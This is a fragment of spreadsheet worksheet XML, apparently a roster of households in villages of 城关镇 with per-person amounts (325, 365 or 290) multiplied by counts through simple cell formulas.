  <sheetFormatPr defaultColWidth="9" defaultRowHeight="24" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="5.625" style="18" customWidth="1"/>
    <col min="2" max="2" width="9.5" style="8" customWidth="1"/>
    <col min="3" max="3" width="13.375" style="8" customWidth="1"/>
    <col min="4" max="4" width="9.75" style="8" customWidth="1"/>
    <col min="5" max="5" width="19.5" style="19" customWidth="1"/>
    <col min="6" max="6" width="14.25" style="19" customWidth="1"/>
    <col min="7" max="8" width="6.625" style="10" customWidth="1"/>
    <col min="9" max="9" width="7.125" style="10" customWidth="1"/>
    <col min="10" max="10" width="12.625" style="19" customWidth="1"/>
    <col min="11" max="11" width="18.875" style="20" customWidth="1"/>
    <col min="12" max="16377" width="9" style="8"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="1:11">
      <c r="A1" s="21" t="s">
        <v>206</v>
      </c>
      <c r="B1" s="21"/>
      <c r="C1" s="21"/>
      <c r="D1" s="21"/>
      <c r="E1" s="21"/>
      <c r="F1" s="21"/>
      <c r="G1" s="21"/>
      <c r="H1" s="21"/>
      <c r="I1" s="22"/>
      <c r="J1" s="21"/>
      <c r="K1" s="21"/>
    </row>
    <row r="2" ht="27" customHeight="1" spans="1:11">
      <c r="A2" s="23" t="s">
        <v>207</v>
      </c>
      <c r="B2" s="24" t="s">
        <v>208</v>
      </c>
      <c r="C2" s="24" t="s">
        <v>209</v>
      </c>
      <c r="D2" s="24" t="s">
        <v>210</v>
      </c>
      <c r="E2" s="24" t="s">
        <v>211</v>
      </c>
      <c r="F2" s="24" t="s">
        <v>212</v>
      </c>
      <c r="G2" s="24" t="s">
        <v>213</v>
      </c>
      <c r="H2" s="24" t="s">
        <v>214</v>
      </c>
      <c r="I2" s="24" t="s">
        <v>215</v>
      </c>
      <c r="J2" s="24" t="s">
        <v>216</v>
      </c>
      <c r="K2" s="24" t="s">
        <v>217</v>
      </c>
    </row>
    <row r="3" customHeight="1" spans="1:11">
      <c r="A3" s="23" t="s">
        <v>218</v>
      </c>
      <c r="B3" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C3" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D3" s="24" t="s">
        <v>221</v>
      </c>
      <c r="E3" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F3" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G3" s="24">
        <v>2</v>
      </c>
      <c r="H3" s="25">
        <v>325</v>
      </c>
      <c r="I3" s="24">
        <f>H3*G3</f>
        <v>650</v>
      </c>
      <c r="J3" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K3" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="4" customHeight="1" spans="1:11">
      <c r="A4" s="23" t="s">
        <v>226</v>
      </c>
      <c r="B4" s="24" t="str">
        <f>B3</f>
        <v>城关镇</v>
      </c>
      <c r="C4" s="24" t="str">
        <f>C3</f>
        <v>东北六组</v>
      </c>
      <c r="D4" s="23" t="s">
        <v>227</v>
      </c>
      <c r="E4" s="23" t="s">
        <v>228</v>
      </c>
      <c r="F4" s="24" t="str">
        <f>F3</f>
        <v>4113210103</v>
      </c>
      <c r="G4" s="24"/>
      <c r="H4" s="24"/>
      <c r="I4" s="24">
        <f t="shared" ref="I4:I67" si="0">H4*G4</f>
        <v>0</v>
      </c>
      <c r="J4" s="24"/>
      <c r="K4" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="5" customHeight="1" spans="1:11">
      <c r="A5" s="23" t="s">
        <v>229</v>
      </c>
      <c r="B5" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C5" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D5" s="24" t="s">
        <v>231</v>
      </c>
      <c r="E5" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F5" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G5" s="24">
        <v>2</v>
      </c>
      <c r="H5" s="25">
        <v>325</v>
      </c>
      <c r="I5" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J5" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K5" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="6" customHeight="1" spans="1:11">
      <c r="A6" s="23" t="s">
        <v>234</v>
      </c>
      <c r="B6" s="24" t="str">
        <f>B5</f>
        <v>城关镇</v>
      </c>
      <c r="C6" s="24" t="str">
        <f>C5</f>
        <v>中华村</v>
      </c>
      <c r="D6" s="23" t="s">
        <v>235</v>
      </c>
      <c r="E6" s="23" t="s">
        <v>236</v>
      </c>
      <c r="F6" s="24" t="str">
        <f>F5</f>
        <v>4113210108</v>
      </c>
      <c r="G6" s="24"/>
      <c r="H6" s="24"/>
      <c r="I6" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J6" s="24"/>
      <c r="K6" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="7" customHeight="1" spans="1:11">
      <c r="A7" s="23" t="s">
        <v>237</v>
      </c>
      <c r="B7" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C7" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D7" s="24" t="s">
        <v>238</v>
      </c>
      <c r="E7" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F7" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G7" s="24">
        <v>1</v>
      </c>
      <c r="H7" s="25">
        <v>365</v>
      </c>
      <c r="I7" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J7" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K7" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="1:11">
      <c r="A8" s="23" t="s">
        <v>240</v>
      </c>
      <c r="B8" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C8" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D8" s="24" t="s">
        <v>241</v>
      </c>
      <c r="E8" s="24" t="s">
        <v>242</v>
      </c>
      <c r="F8" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G8" s="24">
        <v>2</v>
      </c>
      <c r="H8" s="25">
        <v>325</v>
      </c>
      <c r="I8" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J8" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K8" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="1:11">
      <c r="A9" s="23" t="s">
        <v>243</v>
      </c>
      <c r="B9" s="24" t="str">
        <f>B8</f>
        <v>城关镇</v>
      </c>
      <c r="C9" s="24" t="str">
        <f>C8</f>
        <v>中华村</v>
      </c>
      <c r="D9" s="23" t="s">
        <v>244</v>
      </c>
      <c r="E9" s="23" t="s">
        <v>245</v>
      </c>
      <c r="F9" s="24" t="str">
        <f>F8</f>
        <v>4113210108</v>
      </c>
      <c r="G9" s="24"/>
      <c r="H9" s="24"/>
      <c r="I9" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J9" s="24"/>
      <c r="K9" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="10" customHeight="1" spans="1:11">
      <c r="A10" s="23" t="s">
        <v>246</v>
      </c>
      <c r="B10" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C10" s="24" t="s">
        <v>247</v>
      </c>
      <c r="D10" s="24" t="s">
        <v>248</v>
      </c>
      <c r="E10" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F10" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G10" s="24">
        <v>2</v>
      </c>
      <c r="H10" s="25">
        <v>325</v>
      </c>
      <c r="I10" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J10" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K10" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="11" customHeight="1" spans="1:11">
      <c r="A11" s="23" t="s">
        <v>250</v>
      </c>
      <c r="B11" s="24" t="str">
        <f>B10</f>
        <v>城关镇</v>
      </c>
      <c r="C11" s="24" t="str">
        <f>C10</f>
        <v>东北四组</v>
      </c>
      <c r="D11" s="23" t="s">
        <v>251</v>
      </c>
      <c r="E11" s="23" t="s">
        <v>252</v>
      </c>
      <c r="F11" s="24" t="str">
        <f>F10</f>
        <v>4113210103</v>
      </c>
      <c r="G11" s="24"/>
      <c r="H11" s="24"/>
      <c r="I11" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J11" s="24"/>
      <c r="K11" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="12" customHeight="1" spans="1:11">
      <c r="A12" s="23" t="s">
        <v>253</v>
      </c>
      <c r="B12" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C12" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D12" s="24" t="s">
        <v>254</v>
      </c>
      <c r="E12" s="24" t="s">
        <v>255</v>
      </c>
      <c r="F12" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G12" s="24">
        <v>1</v>
      </c>
      <c r="H12" s="25">
        <v>365</v>
      </c>
      <c r="I12" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J12" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K12" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="13" customHeight="1" spans="1:11">
      <c r="A13" s="23" t="s">
        <v>256</v>
      </c>
      <c r="B13" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C13" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D13" s="24" t="s">
        <v>257</v>
      </c>
      <c r="E13" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F13" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G13" s="24">
        <v>2</v>
      </c>
      <c r="H13" s="25">
        <v>325</v>
      </c>
      <c r="I13" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J13" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K13" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="1:11">
      <c r="A14" s="23" t="s">
        <v>259</v>
      </c>
      <c r="B14" s="24" t="str">
        <f>B13</f>
        <v>城关镇</v>
      </c>
      <c r="C14" s="24" t="str">
        <f>C13</f>
        <v>中华村</v>
      </c>
      <c r="D14" s="26" t="s">
        <v>260</v>
      </c>
      <c r="E14" s="26" t="s">
        <v>261</v>
      </c>
      <c r="F14" s="24" t="str">
        <f>F13</f>
        <v>4113210108</v>
      </c>
      <c r="G14" s="24"/>
      <c r="H14" s="24"/>
      <c r="I14" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J14" s="24"/>
      <c r="K14" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="15" customHeight="1" spans="1:11">
      <c r="A15" s="23" t="s">
        <v>262</v>
      </c>
      <c r="B15" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C15" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D15" s="24" t="s">
        <v>264</v>
      </c>
      <c r="E15" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F15" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G15" s="24">
        <v>2</v>
      </c>
      <c r="H15" s="25">
        <v>325</v>
      </c>
      <c r="I15" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J15" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K15" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="16" customHeight="1" spans="1:11">
      <c r="A16" s="23" t="s">
        <v>267</v>
      </c>
      <c r="B16" s="24" t="str">
        <f>B15</f>
        <v>城关镇</v>
      </c>
      <c r="C16" s="24" t="str">
        <f>C15</f>
        <v>西北村</v>
      </c>
      <c r="D16" s="23" t="s">
        <v>268</v>
      </c>
      <c r="E16" s="23" t="s">
        <v>269</v>
      </c>
      <c r="F16" s="24" t="str">
        <f>F15</f>
        <v>4113210106</v>
      </c>
      <c r="G16" s="24"/>
      <c r="H16" s="24"/>
      <c r="I16" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J16" s="24"/>
      <c r="K16" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="1:11">
      <c r="A17" s="23" t="s">
        <v>270</v>
      </c>
      <c r="B17" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C17" s="24" t="s">
        <v>271</v>
      </c>
      <c r="D17" s="24" t="s">
        <v>272</v>
      </c>
      <c r="E17" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F17" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G17" s="24">
        <v>2</v>
      </c>
      <c r="H17" s="25">
        <v>325</v>
      </c>
      <c r="I17" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J17" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K17" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="1:11">
      <c r="A18" s="23" t="s">
        <v>274</v>
      </c>
      <c r="B18" s="24" t="str">
        <f>B17</f>
        <v>城关镇</v>
      </c>
      <c r="C18" s="24" t="str">
        <f>C17</f>
        <v>东北五组</v>
      </c>
      <c r="D18" s="23" t="s">
        <v>275</v>
      </c>
      <c r="E18" s="23" t="s">
        <v>276</v>
      </c>
      <c r="F18" s="24" t="str">
        <f>F17</f>
        <v>4113210103</v>
      </c>
      <c r="G18" s="24"/>
      <c r="H18" s="24"/>
      <c r="I18" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J18" s="24"/>
      <c r="K18" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="1:11">
      <c r="A19" s="23" t="s">
        <v>277</v>
      </c>
      <c r="B19" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C19" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D19" s="24" t="s">
        <v>278</v>
      </c>
      <c r="E19" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F19" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G19" s="24">
        <v>1</v>
      </c>
      <c r="H19" s="25">
        <v>365</v>
      </c>
      <c r="I19" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J19" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K19" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="1:11">
      <c r="A20" s="23" t="s">
        <v>279</v>
      </c>
      <c r="B20" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C20" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D20" s="24" t="s">
        <v>280</v>
      </c>
      <c r="E20" s="24" t="s">
        <v>281</v>
      </c>
      <c r="F20" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G20" s="24">
        <v>1</v>
      </c>
      <c r="H20" s="25">
        <v>365</v>
      </c>
      <c r="I20" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J20" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K20" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="1:11">
      <c r="A21" s="23" t="s">
        <v>282</v>
      </c>
      <c r="B21" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C21" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D21" s="24" t="s">
        <v>283</v>
      </c>
      <c r="E21" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F21" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G21" s="24">
        <v>1</v>
      </c>
      <c r="H21" s="25">
        <v>365</v>
      </c>
      <c r="I21" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J21" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K21" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="1:11">
      <c r="A22" s="23" t="s">
        <v>285</v>
      </c>
      <c r="B22" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C22" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D22" s="24" t="s">
        <v>287</v>
      </c>
      <c r="E22" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F22" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G22" s="24">
        <v>1</v>
      </c>
      <c r="H22" s="25">
        <v>365</v>
      </c>
      <c r="I22" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J22" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K22" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="1:11">
      <c r="A23" s="23" t="s">
        <v>290</v>
      </c>
      <c r="B23" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C23" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D23" s="24" t="s">
        <v>291</v>
      </c>
      <c r="E23" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F23" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G23" s="24">
        <v>1</v>
      </c>
      <c r="H23" s="25">
        <v>365</v>
      </c>
      <c r="I23" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J23" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K23" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="1:11">
      <c r="A24" s="23" t="s">
        <v>293</v>
      </c>
      <c r="B24" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C24" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D24" s="24" t="s">
        <v>294</v>
      </c>
      <c r="E24" s="24" t="s">
        <v>295</v>
      </c>
      <c r="F24" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G24" s="24">
        <v>1</v>
      </c>
      <c r="H24" s="25">
        <v>365</v>
      </c>
      <c r="I24" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J24" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K24" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="1:11">
      <c r="A25" s="23" t="s">
        <v>296</v>
      </c>
      <c r="B25" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C25" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D25" s="24" t="s">
        <v>297</v>
      </c>
      <c r="E25" s="24" t="s">
        <v>298</v>
      </c>
      <c r="F25" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G25" s="24">
        <v>2</v>
      </c>
      <c r="H25" s="25">
        <v>325</v>
      </c>
      <c r="I25" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J25" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K25" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="1:11">
      <c r="A26" s="23" t="s">
        <v>299</v>
      </c>
      <c r="B26" s="24" t="str">
        <f>B25</f>
        <v>城关镇</v>
      </c>
      <c r="C26" s="24" t="str">
        <f>C25</f>
        <v>中华村</v>
      </c>
      <c r="D26" s="23" t="s">
        <v>300</v>
      </c>
      <c r="E26" s="23" t="s">
        <v>292</v>
      </c>
      <c r="F26" s="24" t="str">
        <f>F25</f>
        <v>4113210108</v>
      </c>
      <c r="G26" s="24"/>
      <c r="H26" s="24"/>
      <c r="I26" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J26" s="24"/>
      <c r="K26" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="1:11">
      <c r="A27" s="23" t="s">
        <v>301</v>
      </c>
      <c r="B27" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C27" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D27" s="24" t="s">
        <v>302</v>
      </c>
      <c r="E27" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F27" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G27" s="24">
        <v>1</v>
      </c>
      <c r="H27" s="25">
        <v>365</v>
      </c>
      <c r="I27" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J27" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K27" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="1:11">
      <c r="A28" s="23" t="s">
        <v>304</v>
      </c>
      <c r="B28" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C28" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D28" s="24" t="s">
        <v>305</v>
      </c>
      <c r="E28" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F28" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G28" s="24">
        <v>2</v>
      </c>
      <c r="H28" s="25">
        <v>325</v>
      </c>
      <c r="I28" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J28" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K28" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="29" customHeight="1" spans="1:11">
      <c r="A29" s="23" t="s">
        <v>307</v>
      </c>
      <c r="B29" s="24" t="str">
        <f>B28</f>
        <v>城关镇</v>
      </c>
      <c r="C29" s="24" t="str">
        <f>C28</f>
        <v>中华村</v>
      </c>
      <c r="D29" s="23" t="s">
        <v>308</v>
      </c>
      <c r="E29" s="23" t="s">
        <v>309</v>
      </c>
      <c r="F29" s="24" t="str">
        <f>F28</f>
        <v>4113210108</v>
      </c>
      <c r="G29" s="24"/>
      <c r="H29" s="24"/>
      <c r="I29" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J29" s="24"/>
      <c r="K29" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="1:11">
      <c r="A30" s="23" t="s">
        <v>310</v>
      </c>
      <c r="B30" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C30" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D30" s="24" t="s">
        <v>311</v>
      </c>
      <c r="E30" s="24" t="s">
        <v>312</v>
      </c>
      <c r="F30" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G30" s="24">
        <v>1</v>
      </c>
      <c r="H30" s="25">
        <v>365</v>
      </c>
      <c r="I30" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J30" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K30" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="31" customHeight="1" spans="1:11">
      <c r="A31" s="23" t="s">
        <v>313</v>
      </c>
      <c r="B31" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C31" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D31" s="24" t="s">
        <v>314</v>
      </c>
      <c r="E31" s="24" t="s">
        <v>276</v>
      </c>
      <c r="F31" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G31" s="24">
        <v>1</v>
      </c>
      <c r="H31" s="25">
        <v>365</v>
      </c>
      <c r="I31" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J31" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K31" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="32" customHeight="1" spans="1:11">
      <c r="A32" s="23" t="s">
        <v>315</v>
      </c>
      <c r="B32" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C32" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D32" s="24" t="s">
        <v>316</v>
      </c>
      <c r="E32" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F32" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G32" s="24">
        <v>1</v>
      </c>
      <c r="H32" s="25">
        <v>365</v>
      </c>
      <c r="I32" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J32" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K32" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="1:11">
      <c r="A33" s="23" t="s">
        <v>317</v>
      </c>
      <c r="B33" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C33" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D33" s="24" t="s">
        <v>319</v>
      </c>
      <c r="E33" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F33" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G33" s="24">
        <v>1</v>
      </c>
      <c r="H33" s="25">
        <v>365</v>
      </c>
      <c r="I33" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J33" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K33" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="34" customHeight="1" spans="1:11">
      <c r="A34" s="23" t="s">
        <v>321</v>
      </c>
      <c r="B34" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C34" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D34" s="24" t="s">
        <v>322</v>
      </c>
      <c r="E34" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F34" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G34" s="24">
        <v>2</v>
      </c>
      <c r="H34" s="25">
        <v>325</v>
      </c>
      <c r="I34" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J34" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K34" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="35" customHeight="1" spans="1:11">
      <c r="A35" s="23" t="s">
        <v>324</v>
      </c>
      <c r="B35" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C35" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D35" s="23" t="s">
        <v>325</v>
      </c>
      <c r="E35" s="23" t="s">
        <v>326</v>
      </c>
      <c r="F35" s="24" t="str">
        <f>F34</f>
        <v>4113210106</v>
      </c>
      <c r="G35" s="24"/>
      <c r="H35" s="24"/>
      <c r="I35" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J35" s="24"/>
      <c r="K35" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="36" customHeight="1" spans="1:11">
      <c r="A36" s="23" t="s">
        <v>327</v>
      </c>
      <c r="B36" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C36" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D36" s="24" t="s">
        <v>328</v>
      </c>
      <c r="E36" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F36" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G36" s="24">
        <v>1</v>
      </c>
      <c r="H36" s="25">
        <v>365</v>
      </c>
      <c r="I36" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J36" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K36" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="37" customHeight="1" spans="1:11">
      <c r="A37" s="23" t="s">
        <v>329</v>
      </c>
      <c r="B37" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C37" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D37" s="24" t="s">
        <v>330</v>
      </c>
      <c r="E37" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F37" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G37" s="24">
        <v>2</v>
      </c>
      <c r="H37" s="25">
        <v>325</v>
      </c>
      <c r="I37" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J37" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K37" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="38" customHeight="1" spans="1:11">
      <c r="A38" s="23" t="s">
        <v>332</v>
      </c>
      <c r="B38" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C38" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D38" s="23" t="s">
        <v>333</v>
      </c>
      <c r="E38" s="23" t="s">
        <v>334</v>
      </c>
      <c r="F38" s="24" t="str">
        <f>F37</f>
        <v>4113210106</v>
      </c>
      <c r="G38" s="24"/>
      <c r="H38" s="24"/>
      <c r="I38" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J38" s="24"/>
      <c r="K38" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="39" customHeight="1" spans="1:11">
      <c r="A39" s="23" t="s">
        <v>335</v>
      </c>
      <c r="B39" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C39" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D39" s="24" t="s">
        <v>336</v>
      </c>
      <c r="E39" s="24" t="s">
        <v>337</v>
      </c>
      <c r="F39" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G39" s="24">
        <v>3</v>
      </c>
      <c r="H39" s="25">
        <v>290</v>
      </c>
      <c r="I39" s="24">
        <f t="shared" si="0"/>
        <v>870</v>
      </c>
      <c r="J39" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K39" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="40" customHeight="1" spans="1:11">
      <c r="A40" s="23" t="s">
        <v>338</v>
      </c>
      <c r="B40" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C40" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D40" s="23" t="s">
        <v>339</v>
      </c>
      <c r="E40" s="23" t="s">
        <v>340</v>
      </c>
      <c r="F40" s="24" t="str">
        <f>F39</f>
        <v>4113210103</v>
      </c>
      <c r="G40" s="24"/>
      <c r="H40" s="24"/>
      <c r="I40" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J40" s="24"/>
      <c r="K40" s="24" t="s">
        <v>225</v>
      </c>
    </row>
